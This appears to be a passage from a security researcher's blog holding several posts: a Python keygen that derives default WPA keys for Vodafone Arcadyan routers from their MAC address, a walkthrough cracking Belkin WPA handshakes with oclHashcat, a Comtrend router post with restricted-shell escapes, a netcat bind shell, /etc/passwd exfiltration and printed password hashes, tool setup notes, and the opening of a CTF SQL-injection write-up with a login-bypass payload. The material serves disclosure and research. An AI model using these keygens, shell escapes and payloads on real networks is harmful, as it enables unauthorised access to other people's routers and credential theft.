#[BUILD-WEP] (Y1 Y2 Y3): %1X%1X%1X
##[BUILD-WEP] (M11 XOR S10)=(%1X XOR %1X)=%1X
####Boot Parameters NOT found !!!
##Bootcode version: %s
###Serial number: %s
##Hardware version: %s
##WLAN%c%c%c%c%c%c####[BUILD-WEP] S6,7,8,9,10:[%1X,%1X,%1X,%1X,%1X]
##[BUILD-WEP] M7,8,9,10,11,12:[%1X,%1X,%1X,%1X,%1X,%1X]
##!!! Invalid wireless channel range %d ~ %d
#!!! Use default value %d ~ %d
##default route: %d.%d.%d.%d
#ifno:%d  enableOS:%d enableWEP:%d enableSSN:%d
#!!No configuration file present!!
##!!Cleanup configuration in flash memory!!
##%s> flash version:[%s], [%d.%d.%d]
#etcpip_init_config##Jan 18 2008#16:39:45####Set flash memory layout to #BRN-BOOT####Boot Parameters found !!!
##01234567####[BUILD-WEP] (M12 XOR S9) =(%1X XOR %1X)=%1X
####[BUILD-WEP] (K1  XOR K2) =(%1X XOR %1X)=%1X
####!![E-CFG-VER] Reconfiguration required!!


After that,   some of us were a bit stuck but another user, Mambostar, achieved to figure out the algorithm in order to generate 10 possible keys by using the logs as well as the patents [Look at references] . Two years later, some German researchers reverse engineered some Easybox routers finding the same problems. Either using this algorithm or patents as well,  many routers were exposed around all Germany. One year later more or less 2013-2014, and unfortunately, this algorithm has come back to hit some Spanish routers deployed by Vodafone, actually this model ARV752DPW. However really not many of Vodafone’s routers have been affected for this vulnerability.



Here you go a proof-of-concept of this vulnerability what I coded due to a small difference in the algorithm. Plenty of code has been reused for previous scripts, please take a look at credits in the code. So far the unique difference  appreciated has been the swapping between zeros by ones at the end of the key generation’s algorithm and other stuff very weird like the use of non-hexadecimal characters in the ESSID. If any zero is detected at fifth or sixth byte of the BSSID is automatically transformed into G for the ESSID.

def algorithm(mac):
    '''Sebastian Petters. Changes: Added exceptions and leave out some variables pointless'''
        bytes = [int(x, 16) for x in mac.split(':')]
        c1 = (bytes[-2] << 8) + bytes[-1]
        (s6, s7, s8, s9, s10) = [int(x) for x in '%05d' % (c1)]
        (m9, m10, m11, m12)   = [int(x, 16) for x in mac.replace(':', '')[8:]]
        sys.stderr.write("[!] Check your bssid!  Format XX:XX:XX:XX:XX:XX\n")

    k1 = ( s7 + s8  + m11 + m12) & (0x0F)
    k2 = ( m9 + m10 + s9  + s10) & (0x0F)       
    x1 = k1  ^ s10
    x2 = k1  ^ s9
    x3 = k1  ^ s8
    y1 = k2  ^ m10
    y2 = k2  ^ m11
    y3 = k2  ^ m12
    z1 = m11 ^ s10
    z2 = m12 ^ s9
    z3 = k1  ^ k2

    wpa = "%X%X%X%X%X%X%X%X%X" % (x1, y1, z1, x2, y2, z2, x3, y3, z3) 

    # Spanish modification in this algorithm
    if wpa.find("0") != -1:
        wpa = wpa.replace("0","1")

    return wpa


Any suggestions or feedback is always pretty much appreciated. Also bugs in the code or any enhancement.


$ python vodafoneArcadyanSpain.py -h
usage: vodafoneArcadyanSpain.py [-h] [-b [BSSID]] [-v] [-l]

>>> PoC keygen for WiFi Networks deployed by Vodafone Arcadyan in Spain. So
far only WiFi networks with well-known bssids and essid like VodafoneXXXX are
likely vulnerable. See http://ednolo.alumnos.upv.es/ for more details.
Twitter: @enovella_ and email: ednolo[at]inf.upv.es

optional arguments:
  -h, --help            show this help message and exit
  -v, --version         show program's version number and exit
  -l, --list            List all vulnerable mac address (essid VodafoneXXXX)

  -b [BSSID], --bssid [BSSID]
                        Target mac address

(+) Help: Send me bugs or new targets. Credits buckynet as usual 

$ python vodafoneArcadyanSpain.py -l
[+] Possible vulnerable targets:
	 bssid: 74:31:70:xx:xx:xx 	 essid: VodafoneXXXX
	 bssid: 84:9C:A6:xx:xx:xx 	 essid: VodafoneXXXX
	 bssid: 88:03:55:xx:xx:xx 	 essid: VodafoneXXXX
	 bssid: 1C:C6:3C:xx:xx:xx 	 essid: VodafoneXXXX
	 bssid: 50:7E:5D:xx:xx:xx 	 essid: VodafoneXXXX
	 bssid: 00:12:BF:xx:xx:xx 	 essid: VodafoneXXXX

$ python vodafoneArcadyanSpain.py -b 74:31:70:33:00:11
[+] SSID       : VodafoneGG11
[+] BSSID      : 74:31:70:33:00:11
[+] WPA KEY    : 58639129A
[+] WPS PIN    : 75944988


[+] UPDATE Android  2014-02-15

New version of wlan4xx includes this algorithm. You can find it for android devices at http://wlan4xx.blogspot.com/



[+] References:

http://foro.seguridadwireless.net/desarrollo-112/wlan4xx-algoritmo-routers-yacom/ (SPAIN)
http://www.wotan.cc/?p=6 &http://www.wardriving-forum.de/wiki/Standardpassw%C3%B6rter

[+] Patents:



Categories: Programming, Python, Reversing, Wireless Tags:

Compiling nmap 6.40 on Ubuntu 12.04.3

Sábado, 14 de diciembre de 2013 Sin comentarios

If you are using nmap from Ubuntu repositories, surely you will be using a old version without many features like scripts and other stuff. Therefore, if you want to compile from source code just follow the next steps:

wget http://nmap.org/dist/nmap-6.40.tar.bz2
tar -jxvf nmap-6.40.tar.bz2
cd nmap-6.40
make "LUA_LIBS=../liblua/liblua.a -ldl -lm"
sudo checkinstall
sudo dpkg -i nmap_6.40-1_amd64.deb

And now you can enjoy nmap:

            .       .
             } 6 6 {
            ==. Y ,==
              /^^^\  .
             /     \  )  Ncat: A modern interpretation of classic Netcat
            (  )-(  )/
            -""---""---   /
           /   Ncat    \_/
          (     ____
Configuration complete.
   (  )   /\   _                 (
    \ |  (  \ ( \.(               )                      _____
  \  \ \  `  `   ) \             (  ___                 / _   \
 (_`    \+   . x  ( .\            \/   \____-----------/ (o)   \_
- .-               \+  ;          (  O                           \____
(__                +- .( -'.- <.   \_____________  `              \  /
(_____            ._._: <_ - <- _- _  VVVVVVV VV V\                \/
  .    /./.+-  . .- /  +--  - .    (--_AAAAAAA__A_/                |
  (__ ' /x  / x _/ (                \______________//_              \_______
 , x / ( '  . / .  /                                  \___'          \     /
    /  /  _/ /    +                                       |           \   /
   '  (__/                                               /              \/
                                                       /                  \
Configuration complete.  Type make (or gmake on some *BSD machines) to compile.

$ nmap
Nmap 6.40 ( http://nmap.org )
Usage: nmap [Scan Type(s)] [Options] {target specification}
  Can pass hostnames, IP addresses, networks, etc.
  Ex: scanme.nmap.org, microsoft.com/24,; 10.0.0-255.1-254
  -iL <inputfilename>: Input from list of hosts/networks
  -iR <num hosts>: Choose random targets
  --exclude <host1[,host2][,host3],...>: Exclude hosts/networks
  --excludefile <exclude_file>: Exclude list from file
  -sL: List Scan - simply list targets to scan
  -sn: Ping Scan - disable port scan
  -Pn: Treat all hosts as online -- skip host discovery
  -PS/PA/PU/PY[portlist]: TCP SYN/ACK, UDP or SCTP discovery to given ports
  -PE/PP/PM: ICMP echo, timestamp, and netmask request discovery probes
  -PO[protocol list]: IP Protocol Ping
  -n/-R: Never do DNS resolution/Always resolve [default: sometimes]
  --dns-servers <serv1[,serv2],...>: Specify custom DNS servers
  --system-dns: Use OS's DNS resolver
  --traceroute: Trace hop path to each host
  -sS/sT/sA/sW/sM: TCP SYN/Connect()/ACK/Window/Maimon scans
  -sU: UDP Scan
  -sN/sF/sX: TCP Null, FIN, and Xmas scans
  --scanflags <flags>: Customize TCP scan flags
  -sI <zombie host[:probeport]>: Idle scan
  -sO: IP protocol scan
  -b <FTP relay host>: FTP bounce scan
  -p <port ranges>: Only scan specified ports
    Ex: -p22; -p1-65535; -p U:53,111,137,T:21-25,80,139,8080,S:9
  -F: Fast mode - Scan fewer ports than the default scan
  -r: Scan ports consecutively - don't randomize
  --top-ports <number>: Scan <number> most common ports
  --port-ratio <ratio>: Scan ports more common than <ratio>
  -sV: Probe open ports to determine service/version info
  --version-intensity <level>: Set from 0 (light) to 9 (try all probes)
  --version-light: Limit to most likely probes (intensity 2)
  --version-all: Try every single probe (intensity 9)
  --version-trace: Show detailed version scan activity (for debugging)
  -sC: equivalent to --script=default
  --script=<Lua scripts>: <Lua scripts> is a comma separated list of 
           directories, script-files or script-categories
  --script-args=<n1=v1,[n2=v2,...]>: provide arguments to scripts
  --script-args-file=filename: provide NSE script args in a file
  --script-trace: Show all data sent and received
  --script-updatedb: Update the script database.
  --script-help=<Lua scripts>: Show help about scripts.
           <Lua scripts> is a comma separted list of script-files or
  -O: Enable OS detection
  --osscan-limit: Limit OS detection to promising targets
  --osscan-guess: Guess OS more aggressively
  Options which take <time> are in seconds, or append 'ms' (milliseconds),
  's' (seconds), 'm' (minutes), or 'h' (hours) to the value (e.g. 30m).
  -T<0-5>: Set timing template (higher is faster)
  --min-hostgroup/max-hostgroup <size>: Parallel host scan group sizes
  --min-parallelism/max-parallelism <numprobes>: Probe parallelization
  --min-rtt-timeout/max-rtt-timeout/initial-rtt-timeout <time>: Specifies
      probe round trip time.
  --max-retries <tries>: Caps number of port scan probe retransmissions.
  --host-timeout <time>: Give up on target after this long
  --scan-delay/--max-scan-delay <time>: Adjust delay between probes
  --min-rate <number>: Send packets no slower than <number> per second
  --max-rate <number>: Send packets no faster than <number> per second
  -f; --mtu <val>: fragment packets (optionally w/given MTU)
  -D <decoy1,decoy2[,ME],...>: Cloak a scan with decoys
  -S <IP_Address>: Spoof source address
  -e <iface>: Use specified interface
  -g/--source-port <portnum>: Use given port number
  --data-length <num>: Append random data to sent packets
  --ip-options <options>: Send packets with specified ip options
  --ttl <val>: Set IP time-to-live field
  --spoof-mac <mac address/prefix/vendor name>: Spoof your MAC address
  --badsum: Send packets with a bogus TCP/UDP/SCTP checksum
  -oN/-oX/-oS/-oG <file>: Output scan in normal, XML, s|<rIpt kIddi3,
     and Grepable format, respectively, to the given filename.
  -oA <basename>: Output in the three major formats at once
  -v: Increase verbosity level (use -vv or more for greater effect)
  -d: Increase debugging level (use -dd or more for greater effect)
  --reason: Display the reason a port is in a particular state
  --open: Only show open (or possibly open) ports
  --packet-trace: Show all packets sent and received
  --iflist: Print host interfaces and routes (for debugging)
  --log-errors: Log errors/warnings to the normal-format output file
  --append-output: Append to rather than clobber specified output files
  --resume <filename>: Resume an aborted scan
  --stylesheet <path/URL>: XSL stylesheet to transform XML output to HTML
  --webxml: Reference stylesheet from Nmap.Org for more portable XML
  --no-stylesheet: Prevent associating of XSL stylesheet w/XML output
  -6: Enable IPv6 scanning
  -A: Enable OS detection, version detection, script scanning, and traceroute
  --datadir <dirname>: Specify custom Nmap data file location
  --send-eth/--send-ip: Send using raw ethernet frames or IP packets
  --privileged: Assume that the user is fully privileged
  --unprivileged: Assume the user lacks raw socket privileges
  -V: Print version number
  -h: Print this help summary page.
  nmap -v -A scanme.nmap.org
  nmap -v -sn
  nmap -v -iR 10000 -Pn -p 80
SEE THE MAN PAGE (http://nmap.org/book/man.html) FOR MORE OPTIONS AND EXAMPLES
Categories: Linux, Networking Tags:

RTL2832U in Ubuntu 12.04.3 with kernel 3.8.0

Sábado, 7 de diciembre de 2013 4 comentarios

A long time ago that I couldn’t write in my humble blog, and also this time will be fast and just for remembering how to install RTL2832U drivers on Linux.  I was interested on play with SDR and Osmocon, so I ordered the cheapest Chinese DvB USB stick for around 8$ in order to play with. If we take a look at Osmocom website, we can see how this device is able to work properly.


How to install our RTL2832U on Ubuntu 12.04.3 LTS with kernel 3.8.0:


First of all, let’s connect our DvB USB stick in our box and let’s check manufacturer with:

$ lsusb  
Bus 003 Device 009: ID 0bda:2838 Realtek Semiconductor Corp.



Well, let’s see if our OS was able to load modules. Apparently not :(

$ dmesg
[25415.111665] usb 3-2: new high-speed USB device number 4 using xhci_hcd
[25415.142742] usb 3-2: New USB device found, idVendor=0bda, idProduct=2838
[25415.142748] usb 3-2: New USB device strings: Mfr=1, Product=2, SerialNumber=3
[25415.142751] usb 3-2: Product: RTL2838UHIDIR
[25415.142754] usb 3-2: Manufacturer: Realtek
[25415.142757] usb 3-2: SerialNumber: 00000001
[25415.234923] usbcore: registered new interface driver dvb_usb_rtl28xxu
[25415.235054] usb 3-2: dvb_usb_v2: found a 'Realtek RTL2832U reference design' in warm state
[25415.303306] usb 3-2: dvb_usb_v2: will pass the complete MPEG2 transport stream to the software demuxer
[25415.303322] DVB: registering new adapter (Realtek RTL2832U reference design)
[25415.303637] usb 3-2: dvb_usb_rtl28xxu: unknown tuner=NONE
[25415.316812] usb 3-2: dvb_usb_v2: 'Realtek RTL2832U reference design' error while loading driver (-19)
[25415.317674] usb 3-2: dvb_usb_v2: 'Realtek RTL2832U reference design' successfully deinitialized and disconnected



For reference, it’s a chinese one with no brand, with a rtl2832, and an E4000 tuner. Here you go the right steps in order to watch TV in your box: (Look at references for the 3.8.0 patch or if you trust my website here you go!)

sudo apt-get install linux-headers-`uname-r`
sudo apt-get install  libproc-processtable-perl
mkdir dvb-2832u
cd dvb-2832u
git clone git://linuxtv.org/media_build.git
cd media_build
cd linux/
patch -p1 < ../dvb-usb-rtl2832.patch
cd ..
make allmodconfig
sudo make install




And now we can enjoy our DvB receiver:

$ dmesg
[  150.901226] usb 3-2: dvb_usb_v2: 'Realtek RTL2832U reference design' successfully deinitialized and disconnected
[  154.491864] usb 3-2: new high-speed USB device number 4 using xhci_hcd
[  154.522748] usb 3-2: New USB device found, idVendor=0bda, idProduct=2838
[  154.522753] usb 3-2: New USB device strings: Mfr=1, Product=2, SerialNumber=3
[  154.522756] usb 3-2: Product: RTL2838UHIDIR
[  154.522759] usb 3-2: Manufacturer: Realtek
[  154.522761] usb 3-2: SerialNumber: 00000001
[  154.528776] usb 3-2: dvb_usb_v2: found a 'Realtek RTL2832U reference design' in warm state
[  154.598304] usb 3-2: dvb_usb_v2: will pass the complete MPEG2 transport stream to the software demuxer
[  154.598319] DVB: registering new adapter (Realtek RTL2832U reference design)
[  154.601430] usb 3-2: DVB: registering adapter 0 frontend 0 (Realtek RTL2832 (DVB-T))...
[  154.601493] r820t 0-001a: creating new instance
[  154.614036] r820t 0-001a: Rafael Micro r820t successfully identified
[  154.621529] Registered IR keymap rc-empty
[  154.621628] input: Realtek RTL2832U reference design as /devices/pci0000:00/0000:00:1c.1/0000:03:00.0/usb3/3-2/rc/rc1/input19
[  154.621712] rc1: Realtek RTL2832U reference design as /devices/pci0000:00/0000:00:1c.1/0000:03:00.0/usb3/3-2/rc/rc1
[  154.621865] input: MCE IR Keyboard/Mouse (dvb_usb_rtl28xxu) as /devices/virtual/input/input20
[  154.621935] rc rc1: lirc_dev: driver ir-lirc-codec (dvb_usb_rtl28xxu) registered at minor = 0
[  154.621937] usb 3-2: dvb_usb_v2: schedule remote query interval to 400 msecs
[  154.635023] usb 3-2: dvb_usb_v2: 'Realtek RTL2832U reference design' successfully initialized and connected




Patch : http://forum.stmlabs.com/showthread.php?pid=46468


Categories: Linux Tags:

CrackWPA I : Breaking Belkin WPA passphrases by bruteforce (oclHashcat)

Lunes, 29 de julio de 2013 Sin comentarios


UPDATED!  Due to release of the new algorithm this method is pointless. Take a look at my P0C: https://bitbucket.org/dudux/belkin4xx.

Some months ago I wrote about WPS pins by default (CVE-2012-6371)  in some Belkin routers after reading another interesting post of how bruteforce a wifi network with essids like this : belkin.XXXX (CVE-2012-4366). The researchers afirmed that they found out how to generate default  WPA keys using the mac address using substitution tables. Surely if you have several data then you can figure it out. Otherwise it would be pretty interesting to look for in the firmwares. By the way, in this post I am gonna crack a handshake EAPOL+WPA using oclHashcat-plus and maskprocessor.

Meanwhile I am trying to figure out how to generate those passphrases, we can demonstrate how those used passphrases  are very weak if we use two GPUs like hd7970 .

If you are attempting that at home, you’ll need the next:

  • As many GPUs you can get (at least one is enough)
  • oclHashcat-plus correctly installed in your machine
  • Suite aircrack-ng
  • Maskprocessor ( Also of the Hashcat team)
  • A right handshake of any Belkin wifi network

First of all, we gotta achieve a right handshake with CAP format. The best way is using aircrack-ng, although you can also try it via online using this link: https://hashcat.net/cap2hccap/. When we got  the handshake then if we want to use oclHashcat, we should convert from .cap to .hccap ( Special cap for working with hashcat. Please take a look below for further information)

$ aircrack-ng  9944XXYY35A1_belkin-43a2.cap -J belkin
Opening 9944XXYY35A1_belkin-43a2.cap
Read 12517 packets.

   #  BSSID              ESSID                     Encryption

   1  94:44:XX:YY:35:A1  belkin.43a2               EAPOL+WPA (1 handshake)

Choosing first network as target.

Opening 9944XXYY35A1_belkin-43a2.cap
Reading packets, please wait...

Building Hashcat (1.00) file...

[*] ESSID (length: 11): belkin.43a2
[*] Key version: 2
[*] BSSID: 94:44:XX:YY:35:A1
[*] STA: ZZ:WW:71:3D:B9:7A
[*] anonce:
    4A 9B 2F C4 33 6C 35 33 76 83 50 6C F7 17 57 20 
    B4 0C 7A F7 26 E9 5D 6D F2 97 AA 75 3E AE 7F A9 
[*] snonce:
    05 4F 52 A0 18 78 7C E0 07 E8 89 7E ED 99 A1 97 
    1B F8 30 34 3A 4F 14 EC F0 2D D7 72 4D 3A E1 56 
[*] Key MIC:
    6C 33 F8 97 EA 50 E1 DB 16 5B C9 EC 95 7A 99 C7
[*] eapol:
    01 03 00 75 02 01 0A 00 00 00 00 00 00 00 00 00 
    00 05 4F 52 A0 18 78 7C E0 07 E8 89 7E ED 99 A1 
    97 1B F8 30 34 3A 4F 14 EC F0 2D D7 72 4D 3A E1 
    56 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
    00 00 16 30 14 01 00 00 0F AC 04 01 00 00 0F AC 
    04 01 00 00 0F AC 02 00 00 

Successfully written to belkin.hccap

Quitting aircrack-ng...


hccap specs

Specs at WPA files using hashcat

Secondly, we can use several ways with oclHashcat in order to try crack these networks:

  1. Input STDIN piping with maskprocessor. (Advantage: on-the-fly, no space in HDD is required.  Disadvantage: We cannot watch time,temperature and so on)
  2. Dictionary attack creating a wordlist with maskprocessor previously. ( Advantage: We can watch temperature,time and so on. Disadvantage:  some GB of your HDD)
  3. Bruteforce with -a 3     (Advantage: on-the-fly ,no hardisk, no pipes)    (Thanks philsmd of Hashcat’s IRC for that notation)

I have chose the second one, because I like watching, and the most important can pause the process when I need it. Anyway the speed is exactly the same.

After installing maskprocessor we are able to get the right number of combinations if we know the mask of the attack. We know that Belkin is using WPA passphrases of  lenght: 8 digits with charset: lowercase hexadecimal (0.9a.f). In this moment we can quickly calculate the possible combinations

$ ./mp64.bin --custom-charset1=?dabcdef ?1?1?1?1?1?1?1?1 --combinations

To save the wordlist we simply redirect the output in a file:

$ time ./mp64.bin --custom-charset1=?dabcdef ?1?1?1?1?1?1?1?1 > ../../../wordlist/WPA/belkin.txt

real    14m15.701s
user    1m25.245s
sys      1m9.252s

$ ls -lah belkin.txt

-rwxrwxrwx 1 root root 36G Jul 29 00:20 belkin.txt

In order to crack the handshake using our wordlist and  oclHashcat , we can use the next command:


 $ ./oclHashcat-plus64.bin -m 2500 --gpu-loops=1024  /tocrack/belkin.hccap /wordlist/WPA/belkin.txt 

Generating dictionary stats for /wordlist/WPA/belkin.txt: 1399569552 bytes (3.62%), 155507728 words, 15550772
Generating dictionary stats for /wordlist/WPA/belkin.txt: 1910789568 bytes (4.94%), 212309952 words, 21230995
Generating dictionary stats for /wordlist/WPA/belkin.txt: 2012405022 bytes (5.21%), 223600558 words, 22360055
Generating dictionary stats for /wordlist/WPA/belkin.txt: 2114020476 bytes (5.47%), 234891164 words, 23489116
Generating dictionary stats for /wordlist/WPA/belkin.txt: 2216683512 bytes (5.73%), 246298168 words, 24629816
Generated dictionary stats for /wordlist/WPA/belkin.txt: 38654705664 bytes, 4294967296 words, 4294967296 keyspace                    

[s]tatus [p]ause [r]esume [b]ypass [q]uit => s
Session.Name...: oclHashcat-plus
Status.........: Running
Input.Mode.....: File (/wordlist/WPA/belkin.txt)
Hash.Target....: belkin.43a2 (94:44:XX:YY:35:a1 <-> WW:ZZ:71:3d:b9:7a)
Hash.Type......: WPA/WPA2
Time.Started...: Mon Jul 29 05:31:56 2013 (12 secs)
Time.Estimated.: Mon Jul 29 10:48:33 2013 (5 hours, 9 mins)
Speed.GPU.#1...:   116.8k/s
Speed.GPU.#2...:   119.2k/s
Speed.GPU.#*...:   236.0k/s
Recovered......: 0/1 (0.00%) Digests, 0/1 (0.00%) Salts
Progress.......: 2867200/4294967296 (0.07%)
Rejected.......: 0/2867200 (0.00%)
HWMon.GPU.#1...: 97% Util, 46c Temp, 35% Fan
HWMon.GPU.#2...: 97% Util, 41c Temp, 35% Fan

[s]tatus [p]ause [r]esume [b]ypass [q]uit => 


Session.Name...: oclHashcat-plus
Status.........: Cracked
Input.Mode.....: File (/wordlist/WPA/belkin.txt)
Hash.Target....: belkin.43a2 (94:44:XX:YY:35:a1 <-> WW:ZZ:71:3d:b9:7a)
Hash.Type......: WPA/WPA2
Time.Started...: Mon Jul 29 05:31:56 2013 (1 hour, 59 mins)
Speed.GPU.#1...:   118.1k/s
Speed.GPU.#2...:   118.5k/s
Speed.GPU.#*...:   236.7k/s
Recovered......: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.......: 1686405120/4294967296 (39.26%)
Rejected.......: 0/1686405120 (0.00%)
HWMon.GPU.#1...: 87% Util, 76c Temp, 70% Fan
HWMon.GPU.#2...: 92% Util, 64c Temp, 52% Fan

Started: Mon Jul 29 05:31:56 2013
Stopped: Mon Jul 29 07:38:36 2013

The third way, directly bruteforce. Surely the best:

 ./oclHashcat-plus64.bin -m 2500 --gpu-loops=1024 ../../tocrack/belkin.hccap -a 3 -1 ?dabcdef ?1?1?1?1?1?1?1?1

Finally, we have seen how an attacker could break your security at home. So please, if you have one these routers, you should do that:

  1. Disable WPS feature.
  2. Change the WPA passphrase by default for any one using right passwords policies.

I made a video that’s suming up the process. I hope you enjoy it. I would like to congratulate for the Hashcat team for the great tools which they do. To be honest we appreciate them so much.


Or youtube video: http://www.youtube.com/watch?v=iyJIwr6Ca3U


Categories: Bruteforce, Wireless Tags:

Comtrends (I) … Got shell?

Lunes, 22 de julio de 2013 Sin comentarios

Hi everyone, finally the summer came up and also vacations. I was looking for something in some routers Comtrend, unfortunately a couple years ago, me and my colleague (Mambostar) found out how Comtrend was generating WPA keys with some of theirs routers.  They forgot to delete /var/md5encode , but we could not use a normal “ls”, so we had to find some way of listing in the filesystem. This post is the beginning of  how  bypass those restrictions and also some methods in order to got a root shell or normal shell or reverse shell. If you got new ones, please add your comment and I’ll update this post.

First of all, a simple remainder at the top of the post is required if you do not wanna read all the post.

  • Some ways of get a shell
sysinfo && sh
sysinfo ; sh
echo `command`
cat | sh ( and the command that you wish in the next line)
echo `/bin/sh > /dev/tty`
echo *


  • How can you list files without “ls”?
for v in /* ; do echo $v ; done



  • How can you got a remote shell?

From the router:

cat | sh
/usr/bin/nc -l -p 6666 -e /bin/sh
echo `/usr/bin/nc -l -p 6666 -e /bin/sh`

From your machine/PC:

nc [IProuter] 6666


  • How can you send/receive files?
cat | sh
/usr/bin/nc -l -p 6666 < /etc/passwd
nc [IProuter] 6666 > /etc/passwd





Several examples in some of the most importants routers in Spain Comtrend:

Comtrend BCM96348

dudu@w0rm~:$ telnet
Connected to
Escape character is '^]'.
BCM96348 ADSL Router
Login: 1234
> sh
sh: not found
> echo `ls`
echo `ls`: not found
> sysinfo && sh
Number of processes: 34
  9:00pm  up 16 days, 21:00, 
load average: 1 min:0.00, 5 min:0.00, 15 min:0.00
              total         used         free       shared      buffers
  Mem:        13912        13420          492            0          876
 Swap:            0            0            0
Total:        13912        13420          492

BusyBox v1.00 (2009.07.09-10:31+0000) Built-in shell (msh)
Enter 'help' for a list of built-in commands.

# exit
> sysinfo ; sh
Number of processes: 34
  9:00pm  up 16 days, 21:00, 
load average: 1 min:0.00, 5 min:0.00, 15 min:0.00
              total         used         free       shared      buffers
  Mem:        13912        13428          484            0          876
 Swap:            0            0            0
Total:        13912        13428          484

BusyBox v1.00 (2009.07.09-10:31+0000) Built-in shell (msh)
Enter 'help' for a list of built-in commands.

# help

Built-in commands:
        . : break cd continue eval exec exit export help login newgrp
        read readonly set shift times trap umask wait [ busybox cat chmod
        date df dmesg echo expr false ifconfig init insmod kill killall
        klogd linuxrc ln logger logread md5sum mkdir mount msh ping ps
        pwd reboot rm rmmod route sendarp sh sysinfo syslogd test tftp
        tftpd top true tty vconfig

# cd /usr/bin
# ls
ls: not found
# for i in * ; do echo $i; done

Comtrend BCM96328

dudu@w0rm~:$ telnet
Connected to
Escape character is '^]'.
BCM96328 Broadband Router
Login: admin
 > sh
telnetd:error:424.175:processInput:380:unrecognized command sh
 > sysinfo ; sh
Warning: operator ; is not supported!
Number of processes: 56
 11:00pm  up 16 days, 51 min, 
load average: 1 min:0.01, 5 min:0.04, 15 min:0.01
              total         used         free       shared      buffers
  Mem:        60528        35032        25496            0         4232
 Swap:            0            0            0
Total:        60528        35032        25496
 > sysinfo && sh
Warning: operator & is not supported!
Number of processes: 56
 11:00pm  up 16 days, 51 min, 
load average: 1 min:0.01, 5 min:0.04, 15 min:0.01
              total         used         free       shared      buffers
  Mem:        60528        35056        25472            0         4232
 Swap:            0            0            0
Total:        60528        35056        25472
 > sysinfo | sh 
Number: not found
11:00pm: not found
load: not found
total: not found
Mem:: not found
Swap:: not found
Total:: not found
 > echo `ls`
bin data dev etc lib linuxrc mnt opt proc sbin sys tmp usr var webs
 > cat | sh
bin      dev      lib      mnt      proc     sys      usr      webs
data     etc      linuxrc  opt      sbin     tmp      var
cd etc
adsl                gateway.conf        passwd              smb.conf
arl                 group               ppp                 snmp
default.cfg         inetd.conf          pppmsg              soft_bridge
dhcp                init.d              profile             sysmsg
dhcp6c.conf.sample  inittab             psk.txt             udhcpd.conf
dhcp6s.conf.sample  iproute2            racoon.conf         udhcpd.leases
dms.conf            ipsec.conf          radvd.conf.sample   vlan
dyntos.sh           ipv6_start.sample   resolv.conf         wlan
ethertypes          mdk                 rsa_host_key        wrt54g.large.ico
filesystems         modules_install     samba               wrt54g.small.ico
fstab               mtab                services


Spawn a reverse shell

Using a netcat connection can spawn a shell:

 > cat | sh
bin      dev      lib      mnt      proc     sys      usr      webs
data     etc      linuxrc  opt      sbin     tmp      var
/usr/bin/nc -l -p 6666 -e /bin/sh

From our PC can connect over netcat:

$ nc 6666 
cat /etc/passwd
support:GPTPf8y46J5uo:0:0:Technical Support:/:/bin/sh
user:3SPaREpST/DNM:0:0:Normal User:/:/bin/sh
ftpuser:MNhjJatERtE5k:0:0:user for ftp:/:/bin/sh
nobody:L60iAoNSIza8k:0:0:nobody for ftp:/:/bin/sh

Finally if you got ideas how you would do command injections in these kind of routers, please feel free to discuss in comments.

Next entry I will discuss some important stuffs with those routers.

Keep hacking!  Enjoy the video 😉  Can u feel it?

Categories: Networking, Wireless Tags:

Running OclHashcat-plus with 2X hd7970

Martes, 2 de julio de 2013 Sin comentarios

The first of all, if you have not installed ATI drivers, you can follow this nice Wiki of the  Hashcat staff:


Secondly, if you are having problems so you can read this post:

# List all your cards
$ aticonfig --lsa
* 0. 01:00.0 AMD Radeon HD 7900 Series
  1. 02:00.0 AMD Radeon HD 7900 Series

* - Default adapter

Surely this two commands can be quite pretty useful if you are trying to use both GPU cards and they are not  working together. Or you have problems with your graphics on Ubuntu when your PC boots. Even if you got two or more GPU cards, and you attempt to change the DVI adapter, it is possible if you watch something like that: “ERROR: clGetDeviceIDs() -1″.But you are completely sure that your drivers are okay, I mean the correct version of ATI catalyst for your Hashcat’s version.

# Grab information with all adapters and it creates a new config file
$ sudo aticonfig --initial -f --adapter=all
$ sudo reboot


Now we have done the work, and our 2 cards are working right, for instance we can run a simple example of MD5 cracking with some of the examples of Oclhashcat-plus:

Session.Name...: oclHashcat-plus
Status.........: Exhausted
Input.Base.....: Mask (?a?a?a?a)
Input.Mod......: File (example.dict)
Hash.Target....: File (example0.hash)
Hash.Type......: MD5
Time.Started...: Mon Jul  1 20:31:03 2013 (35 secs)
Time.Estimated.: 0 secs
Speed.GPU.#1...:  3176.6M/s
Speed.GPU.#2...:  2709.5M/s
Speed.GPU.#*...:  5886.1M/s
Recovered......: 2190/6494 (33.72%) Digests, 0/1 (0.00%) Salts
Progress.......: 136302297088/136302297088 (100.00%)
Rejected.......: 1981808640/136302297088 (1.45%)
HWMon.GPU.#1...: 53% Util, 69c Temp, 36% Fan
HWMon.GPU.#2...: 37% Util, 47c Temp, 10% Fan

Started: Mon Jul  1 20:31:03 2013
Stopped: Mon Jul  1 20:31:40 2013


Another thing that I did, it was set up my conkyrc in order to watch my GPU clocks and another important thing like the temperature. Unfortunately, I am not a professional password cracker and use X11 as well. So my cracking server is quite homemade.

${color orange}HASHCAT${hr 2}$color
GPU${alignr}${execi 1 aticonfig --odgc --odgt --adapter=0  | egrep -i "adapter"| head -n 1}
Graphics Clock${alignr}${execi 1  aticonfig --adapter=0 --od-getclocks |grep Clocks |cut -c 32-34} MHz
Graphics Temperature${alignr}${execi 60  aticonfig --odgc --odgt --adapter=0 | egrep -i  "temperature" | awk '// {print $5}'} °C

GPU${alignr}${execi 1 aticonfig --odgc --odgt --adapter=1  | egrep -i "adapter"| head -n 1}
Graphics Clock${alignr}${execi 1  aticonfig --adapter=1 --od-getclocks |grep Clocks |cut -c 32-34} MHz
Graphics Temperature${alignr}${execi 60  aticonfig --odgc --odgt --adapter=1 | egrep -i  "temperature" | awk '// {print $5}'} °C


Example of conkyrc and hashcat running at the same time


If you want to use some stuffs else, you can take a look of my repository at BitBucket

I read some tips in this link:


Categories: Bruteforce Tags:

SQLite injection: DEFCON 21 CTF Babyfirst.

Lunes, 17 de junio de 2013 Sin comentarios

This weekend was DEFCON CTF quals, unfortunately for students is not great time to play CTFs. Anyway I  attempted a simple challenge of 3dub category (web challenges).

The URL of the challenge was this :  http://babysfirst.shallweplayaga.me:8041


We could see a simple login with user/password. First to try is a simple bypass.

Username :  ‘ or ‘1’=’1′– –

